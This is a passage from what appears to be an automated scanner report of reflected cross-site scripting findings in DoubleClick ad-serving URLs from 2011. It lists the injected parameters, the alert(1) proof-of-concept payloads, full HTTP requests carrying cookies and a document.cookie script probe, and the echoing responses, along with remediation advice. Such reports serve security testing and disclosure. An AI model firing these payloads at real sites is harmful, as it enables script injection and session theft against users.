61%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:32:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 9729
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... icles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8de9"-alert(1)-"949f2676f9f was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:31:21 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 9729
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3 ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b6a"-alert(1)-"cafab609dca was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=;ord=1296659628? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:33:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 9723
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = " ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15c43"-alert(1)-"cd748a8fe0a was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0a HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4961 Cache-Control: no-cache Pragma: no-cache Date: Wed, 02 Feb 2011 20:27:49 GMT Expires: Wed, 02 Feb 2011 20:27:49 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0ahttp://degrees.classesusa.com/schools/?sourceid=50545246-232704189-39897819"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 300; var winH = ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138f5"-alert(1)-"eada4e3efbc was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 20:26:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... i8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66758"-alert(1)-"219072ecf8b was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 20:27:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... 2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78291"-alert(1)-"1aa4fa9a8f0 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 20:27:08 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... 3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg = "";
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3a0"-alert(1)-"cc96eba19d7 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: 